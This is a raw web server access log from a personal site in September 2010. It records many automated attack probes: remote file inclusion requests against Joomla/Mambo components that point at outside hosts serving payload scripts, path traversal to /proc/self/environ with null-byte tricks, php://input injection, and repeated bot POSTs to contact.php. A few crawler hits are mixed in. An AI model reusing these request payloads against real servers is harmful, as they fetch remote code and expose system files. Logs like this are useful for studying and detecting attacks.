64.91.254.83 - - [02/Sep/2010:11:29:31 -0700] "GET /logs/access_100102.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:29:36 -0700] "GET /logs/access_080912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:29:42 -0700] "GET /logs/access_090305.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:11:29:43 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:11:29:43 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:11:29:43 -0700] "POST /logs/access_080219.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:29:46 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:29:46 -0700] "POST /logs/access_100707.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:29:46 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:11:30:10 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:11:30:10 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:10 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:11:30:10 -0700] "POST /logs/access_100410.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:10 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:10 -0700] "POST /logs/access_081230.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:10 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:10 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:11 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:11 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:13 -0700] "POST /logs/access_081230.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:14 -0700] "POST /logs/access_081230.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:14 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:14 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:15 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:11:30:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:11:30:15 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:11:30:15 -0700] "POST /logs/access_100410.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:15 -0700] "POST /logs/access_081230.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:15 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:16 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:16 -0700] "POST /logs/access_081230.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:16 -0700] "POST /logs/access_081230.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:30:16 -0700] "POST /logs/access_100705.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:19 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:30:19 -0700] "POST /logs/access_081230.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:30:20 -0700] "GET /logs/access_080912.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:11:30:47 -0700] "POST /logs/access_100611.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:11:30:55 -0700] "GET /megumi/minamigrad2k8/IMG_1656.CR2 HTTP/1.0" 200 8999253 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:11:31:01 -0700] "POST /logs/access_100611.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:11:31:24 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:11:31:24 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:11:31:25 -0700] "POST /logs/access_080219.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:31:28 -0700] "GET /logs/access_100102.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:31:36 -0700] "GET /logs/access_090305.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:31:38 -0700] "GET /logs/access_100509.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:31:45 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:31:45 -0700] "POST /logs/access_100707.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:31:45 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:32:01 -0700] "GET /logs/access_090404.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:32:14 -0700] "POST /logs/access_100705.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:11:32:18 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:11:32:18 -0700] "GET /logs/access_081013.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:11:32:18 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:32:18 -0700] "GET /logs/access_080912.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:33:06 -0700] "GET /logs/access_100508.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:33:57 -0700] "GET /logs/access_080628.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:34:04 -0700] "POST /logs/access_100707.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:34:04 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:34:04 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:34:10 -0700] "GET /logs/access_100509.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:34:33 -0700] "POST /logs/access_100705.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:34:34 -0700] "GET /logs/access_090404.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:35:14 -0700] "POST /logs/access_100707.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:35:14 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:35:14 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:35:15 -0700] "GET /logs/access_100508.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:11:35:35 -0700] "GET /megumi/sedona/2008-11-11/026.CR2 HTTP/1.0" 200 8926984 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:35:38 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:35:38 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:35:38 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:35:38 -0700] "GET /logs/access_080421.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:35:38 -0700] "GET /logs/access_080421.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:35:38 -0700] "GET /logs/access_081006.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:35:38 -0700] "GET /logs/access_081006.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:35:41 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:11:35:44 -0700] "POST /logs/access_100705.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:06 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:06 -0700] "GET /logs/access_080923.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:06 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:07 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:08 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:08 -0700] "GET /logs/access_080923.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:14 -0700] "GET /logs/access_080103.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:36:18 -0700] "GET /logs/access_080628.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:18 -0700] "GET /logs/access_080103.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:20 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:20 -0700] "GET /logs/access_080923.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:20 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:26 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:26 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:26 -0700] "GET /logs/access_080923.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:38 -0700] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:11:36:39 -0700] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:36:46 -0700] "GET /logs/access_100502.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:36:58 -0700] "GET /logs/access_090321.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:11:37:01 -0700] "GET /logs/access_090607.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:11:37:04 -0700] "GET /logs/access_090607.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:11:37:07 -0700] "GET /logs/access_090607.log//?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:11:37:07 -0700] "POST /logs/access_090607.log//?option=com_agora&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:11:37:08 -0700] "GET /logs/access_090607.log//?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:37:53 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:38:02 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:38:10 -0700] "GET /logs/access_090527.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:11:38:18 -0700] "GET /logs/access_081013.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:38:26 -0700] "GET /logs/access_090524.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:39:04 -0700] "GET /logs/access_090321.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.88.29.247 - - [02/Sep/2010:11:39:55 -0700] "GET / HTTP/1.1" 200 68345 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:40:30 -0700] "GET /logs/access_090527.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:11:40:38 -0700] "GET /logs/access_080112.log///tools/send_reminders.php?noSet=0&includedir=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:11:40:38 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:11:40:38 -0700] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:40:46 -0700] "GET /logs/access_090524.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:40:49 -0700] "GET /logs/access_080928.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:41:01 -0700] "GET /bikes/GPS/?N=A HTTP/1.1" 200 954 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:41:02 -0700] "GET /bikes/GPS/WeSTOC2006/?N=A HTTP/1.1" 200 849 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:41:04 -0700] "GET /bikes/GPS/WeSTOC2008/?N=A HTTP/1.1" 200 858 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:41:06 -0700] "GET /bikes/dteel/2009_02_12/?N=A HTTP/1.1" 200 710 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:41:07 -0700] "GET /bikes/dteel/WeSTOC07/?N=A HTTP/1.1" 200 706 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:41:09 -0700] "GET /bikes/GPS/crestoc09/?N=A HTTP/1.1" 200 846 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:41:10 -0700] "GET /megumi/sedona/2008-11-11/024.CR2 HTTP/1.1" 200 2752512 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
